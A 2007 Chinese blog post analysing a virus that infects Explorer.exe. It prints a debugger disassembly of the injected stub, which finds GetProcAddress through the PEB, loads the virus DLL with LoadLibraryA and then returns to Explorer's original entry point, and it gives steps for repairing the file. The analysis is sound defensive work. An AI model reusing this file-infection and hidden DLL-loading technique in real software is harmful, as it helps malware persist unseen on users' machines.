被感染的Explorer.exe病毒加载方式。。_孤独更可靠

查看文章

被感染的Explorer.exe病毒加载方式。。

2007-12-06 20:23

原来有写个，感染方式是一样的：

http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/5eeffb39a59f86f03a87cebb.html

不过太懒，没有认真看，现在简单分析下：

0043E000 > 60              pushad
0043E001    64:A1 30000000 mov     eax, dword ptr fs:[30]
0043E007    8B40 0C         mov     eax, dword ptr ds:[eax+C]
0043E00A    8B70 1C         mov     esi, dword ptr ds:[eax+1C]
0043E00D    AD              lods    dword ptr ds:[esi]
0043E00E    8B40 08         mov     eax, dword ptr ds:[eax+8]
0043E011    8BF8            mov     edi, eax
0043E013    8BE8            mov     ebp, eax
0043E015    8B45 3C         mov     eax, dword ptr ss:[ebp+3C]
0043E018    8B5405 78       mov     edx, dword ptr ss:[ebp+eax+78]
0043E01C    03D5            add     edx, ebp
0043E01E    8B4A 18         mov     ecx, dword ptr ds:[edx+18]
0043E021    8B5A 20         mov     ebx, dword ptr ds:[edx+20]
0043E024    03DD            add     ebx, ebp
0043E026    49              dec     ecx
0043E027    8B348B          mov     esi, dword ptr ds:[ebx+ecx*4]
0043E02A    03F5            add     esi, ebp
0043E02C    B8 47657450     mov     eax, 50746547
0043E031    3906            cmp     dword ptr ds:[esi], eax
0043E033 ^ 74 F1           je      short 0043E026
0043E035    B8 726F6341     mov     eax, 41636F72
0043E03A    3946 04         cmp     dword ptr ds:[esi+4], eax
0043E03D ^ 74 E7           je      short 0043E026              \\查找GetProcAddress地址
0043E03F    8B5A 24         mov     ebx, dword ptr ds:[edx+24]
0043E042    03DD            add     ebx, ebp
0043E044    66:8B0C4B       mov     cx, word ptr ds:[ebx+ecx*2]
0043E048    8B5A 1C         mov     ebx, dword ptr ds:[edx+1C]
0043E04B    03DD            add     ebx, ebp
0043E04D    8B048B          mov     eax, dword ptr ds:[ebx+ecx*4]
0043E050    03C5            add     eax, ebp
0043E052    55              push    ebp
0043E053    83EC 50         sub     esp, 50
0043E056    8BEC            mov     ebp, esp
0043E058    8945 40         mov     dword ptr ss:[ebp+40], eax
0043E05B    6A 00           push    0
0043E05D    68 61727941     push    41797261
0043E062    68 4C696272     push    7262694C
0043E067    68 4C6F6164     push    64616F4C \\LoadLibraryA....加载病毒用的
0043E06C    54              push    esp
0043E06D    57              push    edi
0043E06E    FF55 40         call    dword ptr ss:[ebp+40]
0043E071    8945 44         mov     dword ptr ss:[ebp+44], eax
0043E074    6A 00           push    0
0043E076    68 64743000     push    307464
0043E07B    68 53797349     push    49737953\\病毒.dll
0043E080    54              push    esp
0043E081    FF55 44         call    dword ptr ss:[ebp+44] \\执行代码
0043E084    8BE5            mov     esp, ebp
0043E086    83C4 50         add     esp, 50
0043E089    61              popad
0043E08A - E9 F9A0FCFF     jmp     00408188\\返回explorer原入口

修复方法：

1、删除被增加的区段

2、对齐镜像大小

3、修改入口，就OK了

其实只要从dllcache复制过来就可以了，不过那么繁琐。

是被这个东东感染的：

http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/f8d358c685c610189d163d0d.html

类别：原创(病毒分析)``` | 添加到搜藏 | 浏览() | 评论 (2)

姓　名：	*姓名最长为50字节

网址或邮箱：	(选填)

内　容：

验证码：	请点击后输入四位验证码，字母不区分大小写看不清?
	取消回复